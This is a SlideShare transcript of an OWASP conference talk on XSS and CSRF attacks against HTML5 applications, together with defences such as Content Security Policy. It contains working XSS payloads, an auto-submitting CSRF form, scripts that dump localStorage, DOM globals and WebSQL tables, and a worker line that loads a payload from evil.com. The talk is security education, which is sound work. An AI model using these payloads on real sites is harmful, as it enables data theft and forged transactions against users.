Your SlideShare is downloading. ×
XSS and CSRF with HTML5
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

XSS and CSRF with HTML5

14,755
views

Published on

Published in: Technology

3 Comments
19 Likes
Statistics
Notes
No Downloads
Views
Total Views
14,755
On Slideshare
0
From Embeds
0
Number of Embeds
53
Actions
Shares
0
Downloads
0
Comments
3
Likes
19
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. XSS & CSRF with HTML5 Attack, Exploit and Defense Shreeraj Shah Blueinfy Solutions Pvt. Ltd. shreeraj.shah@blueinfy.netOWASPOWASP AppSecUSA 2012 Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation http://www.owasp.org
  • 2. http://shreeraj.blogspot.com http://shreeraj.blogspot.com shreeraj@blueinfy.com shreeraj@blueinfy.com http://www.blueinfy.com Who Am I? http://www.blueinfy.com Twitter --@shreeraj Twitter @shreeraj Founder & Director  Blueinfy & iAppSecure Solutions Pvt. Ltd. Past experience  Net Square (Founder), Foundstone (R&D/Consulting), Chase(Middleware), IBM (Domino Dev) Interest  Web security research Published research  Articles / Papers – Securityfocus, O’erilly, DevX, InformIT etc.  Tools – DOMScan, DOMTracer, wsScanner, scanweb2.0, AppMap, AppCodeScan, AppPrint etc.  Advisories - .Net, Java servers etc.  Presented at Blackhat, RSA, InfoSecWorld, OSCON, OWASP, HITB, Syscan, DeepSec etc. Books (Author)  Web 2.0 Security – Defending Ajax, RIA and SOA  Hacking Web Services  Web Hacking OWASP 2
  • 3. HTML5 VECTORS – ATTACKSURFACE OWASP 3
  • 4. HTML5 – Attacks on the rise …Evolution of HTML5 1991 – HTML started (plain and simple) 1996 – CSS & JavaScript (Welcome to world of XSS and browser security) 2000 – XHTML1 (Growing concerns and attacks on browsers) 2005 – AJAX, XHR, DOM – (Attack cocktail and surface expansion) 2009 – HTML5 (Here we go… new surface, architecture and defense) – HTML+CSS+JS OWASP 4
  • 5. Modern Browser Model Mobile HTML5 + CSS Silverlight FlashAPI (Media, Geo etc.) & Messaging Plug-In Presentation JavaScript DOM/Events Parser/Threads Process & Logic WebSQL Cache Storage FileSystem XHR 1 & 2 WebSocket Plug-in Sockets Browser Native Network Services Network & Access SOP/CORS/Content-Sec Sandbox Core Policies OWASP 5
  • 6. HTML5 Architecture & Threat Model User Interface Cross Domain Application Sandbox (Origin – Policy ) HTML/CSSSingle JavaScript InternetDOM/PageApplication XHR Target DOM WebSockets Application Native Storage, WebSQL, IndexedDB Messaging APIs Geolocation and other FileSystem, Cache - APIs APIs OWASP 6
  • 7. CSRF WITH HTML5 OWASP 7
  • 8. CSRF Attack Vector ge Attacker’s a RF r’ sp s CS Site Authentication ke c nd Server tta r se a d it A ke ylo Vis t ac pa At CSRF Attack – with session Login Success – cookie set Success Web Store Database Client/Victim Application Server Browser Server Successful exploitation … •SOP bypass •Cookie Replay OWASP 8
  • 9. SOP bypass and Cookie Replay – Basic Type GET Request IMG SRC <img src="http://host/?command"> SCRIPT SRC <script src="http://host/?command"> IFRAME SRC <iframe src="http://host/?command"> POST Request <script type="text/javascript" language="JavaScript"> document.foo.submit(); </script> OWASP 9
  • 10. Streams – name/value pairs are gone … JSON XML JS-Script JS-Object JS-Array OWASP 10
  • 11. CSRF injection – splitting and forcing …<html><body><FORM NAME="buy" ENCTYPE="text/plain"action="http://trade.example.com/xmlrpc/trade.rem" METHOD="POST"> <input type="hidden" name=<?xml version value="1.0"?><methodCall><methodName>stocks.buy</methodName><params><param><value><string>MSFT</string></value></param><param><value><double>26</double></value></param></params></methodCall>></FORM><script>document.buy.submit();</script></body></html> OWASP 11
  • 12. CSRF with XHR and CORS bypass Mobile HTML5 + CSS Silverlight FlashAPI (Media, Geo etc.) & Messaging Plug-In Presentation JavaScript DOM/Events Parser/Threads Process & Logic WebSQL Cache Storage XHR 1 & 2 WebSocket Plug-in Sockets Browser Native Network Services Network & Access SOP/CORS Sandbox Core Policies OWASP 12
  • 13. XHR – Level 2 powering CSRFXHR object of HTML5 is very powerful Allows interesting features like cross origin request and binary upload/downloadxhr.responseType can be set to "text", "arraybuffer", "document“ and "blob“Also, for posting data stream - DOMString, Document, FormData, Blob, File, ArrayBuffer etc… OWASP 13
  • 14. CORS & XHR – ingredients for CSRFBefore HTML5 – Cross Domain was not possible through XHR (SOP applicable)HTML5 – allows cross origin calls with XHR-Level 2 callsCORS – Cross Origin Resource Sharing needs to be followed (Option/Preflight calls)Adding extra HTTP header (Access-Control-Allow- Origin and few others) OWASP 14
  • 15. CORS based HTTP HeadersRequest Origin Access-Control-Request-Method (preflight) Access-Control-Request-Headers (preflight)Response Access-Control-Allow-Origin Access-Control-Allow-Credentials Access-Control-Allow-Expose-Headers Access-Control-Allow-Max-Age (preflight) Access-Control-Allow-Allow-Methods (preflight) Access-Control-Allow-Allow-Headers (preflight) OWASP 15
  • 16. XHR – Stealth POST/GETCSRF – powered by CORS and XHR Hence, allow stealth channel and possible silent exploitation One way CSRF with any stream since XHR allows raw stream from browser (XML, JSON, Binary as well) Two way CSRF (POST and read both – in case of allow set to *) OWASP 16
  • 17. Exploiting the use caseCORS preflight bypass – certain Content-Type bypass preflight HTTPForcing cookie replay by “withCredentials”Internal network scanning and tunnelingInformation harvesting (internal crawling)Stealth browser shell – post XSS (Allow origin- *)Business functionality abuse (upload and binary streams) OWASP 17
  • 18. CSRF with XHR/HTML5 Authentication User Server establishing Session Login request (HTTPS) Session cookie Web Store Database Client/Victim Application Server Browser Server OWASP 18
  • 19. CSRF with XHR/HTML5 Browser using XHR Call Authentication JavaScript User making Server a buy over HTTP Placing an order (JSON services) Success Web Store Database Client/Victim Application Server Browser Server OWASP 19
  • 20. CSRF with XHR/HTML5 ge Attacker’s a RF r’ sp s CS Site Session is Authentication ke c nd Server tta r se a d still live – not it A ke ylo Vis t ac pa yet logged At out Web Store Database Client/Victim Application Server Browser Server Leveraging XHR Call • Content-type to avoid pre flight • “withCredentials” set to true OWASP 20
  • 21. CSRF & HTML5 OWASP 21
  • 22. CSRF with XHR/HTML5 ge Attacker’s a RF r’ sp s CS Site Authentication ke c nd Server tta r se a d it A ke ylo Vis t ac pa At XHR initiates HTTP buy request Success – cookie replayed Web Store Database Client/Victim Application Server Browser Server Hence, • Without victim’s consent or notice Got it • Stealth HTTP request generated • Silent Exploitation takes place OWASP 22
  • 23. CSRF & HTML5 OWASP 23
  • 24. CSRF with XHR/HTML5 Browser is having Form (multi-part) Business Authentication Server layer function of uploading Uploading bulk orders Success Web Store Database Client/Victim Application Server Browser Server OWASP 24
  • 25. CSRF/Upload - POC OWASP 25
  • 26. CSRF with XHR/HTML5 ge Attacker’s a RF r’ sp s CS Site Authentication ke c nd Server tta r se a d it A ke ylo Vis t ac pa At XHR initiates HTTP multi-part - Upload Success – cookie replayed Web Store Database Client/Victim Application Server Browser Server Hence, • Without victim’s consent or notice Got it • Stealth HTTP Upload takes place • Silent Exploitation… OWASP 26
  • 27. CSRF/Upload OWASP 27
  • 28. Internal Scan – not scan but crawl as well … Attacker’s Site Internet Internet CSRF Payload And stealth channel Client/Victim Intranet Intranet Browser Internal Web Internal HR Internal Web/App Mail Application Server OWASP 28
  • 29. Internal Scan for CORS OWASP 29
  • 30. Scan and DefendScan and look for Content-Type checking on server side CORS policy scan Form and Upload with tokens or notDefense and Countermeasures Secure libraries for streaming HTML5/Web 2.0 content CSRF protections Stronger CORS implementation OWASP 30
  • 31. XSS WITH HTML5 OWASP 31
  • 32. XSS with HTML5 (tags, attributes and events) Mobile HTML5 + CSS Silverlight FlashAPI (Media, Geo etc.) & Messaging Plug-In Presentation JavaScript DOM/Events Parser/Threads Process & Logic WebSQL Cache Storage XHR 1 & 2 WebSocket Plug-in Sockets Browser Native Network Services Network & Access SOP/CORS Sandbox Core Policies OWASP 32
  • 33. HTML5 – Tags/Attributes/EventsTags – media (audio/video), canvas (getImageData), menu, embed, buttons/commands, Form control (keys)Attributes – form, submit, autofocus, sandbox, manifest, rel etc.Events/Objects – Navigation (_self), Editable content, Drag-Drop APIs, pushState (History) etc. OWASP 33
  • 34. XSS variantsMedia tagsExamples <video><source onerror="javascript:alert(1)“> <video onerror="javascript:alert(1)"><source> OWASP 34
  • 35. XSS variantsExploiting autofocus <input autofocus onfocus=alert(1)> <select autofocus onfocus=alert(1)> <textarea autofocus onfocus=alert(1)> <keygen autofocus onfocus=alert(1)> OWASP 35
  • 36. XSS variantsForm & Button etc. <form id="test" /><button form="test" formaction="javascript:alert(1)">test <form><button formaction="javascript:alert(1)">testEtc … and more … Nice HTML5 XSS cheat sheet (http://html5sec.org/) OWASP 36
  • 37. Scan and DefendScan and look for Reflected or Persistent XSS spots with HTML5 tagsDefense and Countermeasures Have it added on your blacklist Standard XSS protections by encoding OWASP 37
  • 38. CSP in Action – HTML5 defense …Content Security Policy – Defending browser against possible post attack scenarios Based on Origin (SOP the key) Allows whitelisting mechanism for what “to do” and “not to do” It is possible to send back notification to application when violation takes place Implementation by extra HTTP headers [Brower to browser X-WebKit-CSP (S/C) X-Content-Security-Policy (F)] OWASP 38
  • 39. Blocking ScriptsContent-Security-Policy: script-src self‘ Only allowing script from the selfOther mechanism unsafe-inline - blocking inline unsafe-eval‘ – blocking eval type callsPost XSS defense can be crafted OWASP 39
  • 40. Controlling Browserconnect-src – Controlling WebSocket, XHR etc.frame-src – Source of the frame (ClickJacking)object-src – Flash, Silverlight etc.media-src – controlling audio and videoimg/style – image and style sourcesdefault-src https:; - locking over SSL only OWASP 40
  • 41. Example Persistent XSS injectedHTTP/1.1 200 OKDate: Wed, 12 Sep 2012 14:40:31 GMTServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETX-WebKit-CSP: script-src selfX-AspNet-Version: 2.0.50727Cache-Control: privateContent-Type: text/html; charset=utf-8Content-Length: 6146 OWASP 41
  • 42. Storage extraction with XSS Mobile HTML5 + CSS Silverlight FlashAPI (Media, Geo etc.) & Messaging Plug-In Presentation JavaScript DOM/Events Parser/Threads Process & Logic WebSQL Cache Storage XHR 1 & 2 WebSocket Plug-in Sockets Browser Native Network Services Network & Access SOP/CORS Sandbox Core Policies OWASP 42
  • 43. Web Storage ExtractionBrowser has one place to store data – Cookie (limited and replayed)HTML5 – Storage API provided (Local and Session)Can hold global scoped variableshttp://www.w3.org/TR/webstorage/ OWASP 43
  • 44. Web Storage ExtractionIt is possible to steal them through XSS or via JavaScriptSession hijacking – HttpOnly of no usegetItem and setItem callsXSS the box and scan through storage OWASP 44
  • 45. Blind storage enumerationif(localStorage.length){ console.log(localStorage.length) for(i in localStorage){ console.log(i) console.log(localStorage.getItem(i)); }}Above code allows all storage variable extraction OWASP 45
  • 46. File System StorageHTML5 provides virtual file system with filesystem APIs window.requestFileSystem = window.requestFileSystem || window.webkitRequestFileSystem;It becomes a full blown local system for application in sandboxIt empowers application OWASP 46
  • 47. File System StorageIt provides temporary or permanent file system function init() { window.requestFileSystem(window.TEMPORARY, 1024*1024, function(filesystem) { filesys = filesystem; }, catcherror); } App can have full filesystem in place now. OWASP 47
  • 48. Sensitive information filesystemAssuming app is creating profile on local system OWASP 48
  • 49. Extraction through XSSOnce have an entry point – game over! OWASP 49
  • 50. Single DOM/One Page App - XSSApplications run with “rich” DOMJavaScript sets several variables and parameters while loading – GLOBALSIt has sensitive information and what if they are GLOBAL and remains during the life of applicationIt can be retrieved with XSSHTTP request and response are going through JavaScripts (XHR) – what about those vars? OWASP 50
  • 51. Blind Enumerationfor(i in window){ obj=window[i]; try{ if(typeof(obj)=="string"){ console.log(i); console.log(obj.toString()); } }catch(ex){}} OWASP 51
  • 52. Global Sensitive Information Extraction from DOMHTML5 apps running on Single DOMHaving several key global variables, objects and array var arrayGlobals = [my@email.com,"12141hewvsdr9321343423mjfdvint","t est.com"];Post DOM based exploitation possible and harvesting all these values. OWASP 52
  • 53. Global Sensitive Information Extraction from DOMfor(i in window){ obj=window[i]; if(obj!=null||obj!=undefined) var type = typeof(obj); if(type=="object"||type=="string") { console.log("Name:"+i) try{ my=JSON.stringify(obj); console.log(my) }catch(ex){} }} OWASP 53
  • 54. Scan and DefendScan and look for Scanning storageDefense and Countermeasures Do not store sensitive information on localStorage and Globals XSS protection OWASP 54
  • 55. SQLi & Blind Enumeration through XSS Mobile HTML5 + CSS Silverlight FlashAPI (Media, Geo etc.) & Messaging Plug-In Presentation JavaScript DOM/Events Parser/Threads Process & Logic WebSQL Cache Storage XHR 1 & 2 WebSocket Plug-in Sockets Browser Native Network Services Network & Access SOP/CORS Sandbox Core Policies OWASP 55
  • 56. SQL InjectionWebSQL is part of HTML 5 specification, it provides SQL database to the browser itself.Allows one time data loading and offline browsing capabilities.Causes security concern and potential injection points.Methods and calls are possible OWASP 56
  • 57. SQL InjectionThrough JavaScript one can harvest entire local database.Example OWASP 57
  • 58. Blind WebSQL Enumerationvar dbo;var table;var usertable;for(i in window){ obj = window[i]; try{ if(obj.constructor.name=="Database"){ dbo = obj; obj.transaction(function(tx){ tx.executeSql(SELECT name FROM sqlite_master WHERE type=table, [],function(tx,results){ table=results; },null); }); } }catch(ex){}}if(table.rows.length>1) usertable=table.rows.item(1).name; OWASP 58
  • 59. Blind WebSQL EnumerationWe will run through all objects and get object where constructor is “Database”We will make Select query directly to sqlite_master databaseWe will grab 1st table leaving webkit table on 0th entry OWASP 59
  • 60. Blind WebSQL Enumeration OWASP 60
  • 61. Web Messaging and Worker Injection Mobile HTML5 + CSS Silverlight FlashAPI (Media, Geo etc.) & Messaging Plug-In Presentation JavaScript DOM/Events Parser/Threads Process & Logic WebSQL Cache Storage XHR 1 & 2 WebSocket Plug-in Sockets Browser Native Network Services Network & Access SOP/CORS Sandbox Core Policies OWASP 61
  • 62. Web Messaging HTML5 is having new interframe communication system called Web Messaging. By postMessage() call parent frame/domain can call with the iframe Iframe can be loaded on cross domain. Hence, create issues – data/information validation & data leakage by cross posting possible worker.webkitPostMessage – faster transferable objects OWASP 62
  • 63. Web Messaging - ScenarioIf postMessage() is set to * so page can be loaded in iframe and messaging can be hijackedAlso, origin is not set to fixed then again frame listen from any domian – again an issueStream coming needs to be checked before innerHTML or eval()Iframe or Web Worker can glue two streams – same domain or cross domain OWASP 63
  • 64. Origin check OWASP 64
  • 65. Web Worker – Hacks!Web Workers allows threading into HTML pages using JavaScriptNo need to use JavaScript calls like setTimeout(), setInterval(), XMLHttpRequest, and event handlersTotally Async and well supported [initialize] var worker = new Worker(task.js); [Messaging] worker.postMessage(); OWASP 65
  • 66. Web Worker – Hacks! Web Page Current DOM Web Worker XHR, Location, Navigator etc. JavaScript Runtime Browser Platform Background Thread on same Scope and Object – No DOM Access page - messaging Regex, Array, JSON etc… OWASP 66
  • 67. Web Worker – Hacks!Security issues It is not allowing to load cross domain worker scripts. (http:, https:,javascript:,data : -No) It has some typical issues  It allows the use of XHR. Hence, in-domain and CORS requests possible  It can cause DoS – if user get stream to run JavaScript in worker thread. Don’t have access to parent DOM though  Message validation needed – else DOM based XSS OWASP 67
  • 68. Web Worker – Hacks! Exmaple<html><button onclick="Read()">Read Last Message</button><button onclick="stop()">Stop</button><output id="result"></output><script> function Read() { worker.postMessage({cmd: read, msg: last}); } function stop() { worker.postMessage({cmd: stop, msg: stop it}); alert("Worker stopped"); } var worker = new Worker(message.js); worker.addEventListener(message, function(e) { document.getElementById(result).innerHTML = e.data; }, false);</script></html> OWASP 68
  • 69. Web Workers – Hacks!Possible to cause XSS Running script Passing hidden payloadAlso, web workers can help in embedding silent running js file and can be controlled.Can be a tool for payload delivery and control within browser frameworkimportScripts("http://evil.com/payload.js") – worker can run cross domain script OWASP 69
  • 70. Scan and DefendScan and look for JavaScript scanning Messaging and Worker implementation DOM calls Use of eval(), document.* calls etc.Defense and Countermeasures Same origin listening is a must for messaging event Secure JavaScript coding OWASP 70
  • 71. APIs …HTML5 few other APIs are interesting from security standpoint File APIs – allows local file access and can mixed with ClickJacking and other attacks to gain client files. Drag-Drop APIs – exploiting self XSS and few other tricks, hijacking cookies …  Lot more to explore and defend… OWASP 71
  • 72. Resources/Referenceshttp://www.html5rocks.com/en/ (Solid stuff)https://www.owasp.org/index.php/HTML5_Security _Cheat_Sheet (OWASP stuff)http://html5sec.org/ (Quick Cheat sheet)http://html5security.org/ (Good resources)http://blog.kotowicz.net/ (Interesting work) OWASP 72
  • 73. http://shreeraj.blogspot.com http://shreeraj.blogspot.com shreeraj@blueinfy.com shreeraj@blueinfy.com http://www.blueinfy.com http://www.blueinfy.comCONCLUSION AND QUESTIONS OWASP 73

×